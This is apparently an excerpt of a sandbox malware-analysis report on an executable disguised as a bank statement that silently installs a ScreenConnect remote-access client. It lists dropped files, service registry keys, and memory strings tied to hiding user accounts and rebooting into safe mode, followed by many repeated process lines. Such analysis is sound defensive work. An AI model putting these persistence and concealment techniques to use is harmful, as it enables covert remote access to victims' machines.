                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI586B.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56A4.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI586B.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (d519fd2fdcfe66e7)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000004.00000003.1720285276.0000000004713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2969214232.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808027783.0000000000C00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808808896.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808367972.0000000000C72000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1818019748.000000001B442000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: 2024-11 eStmt 5563019.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.4.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
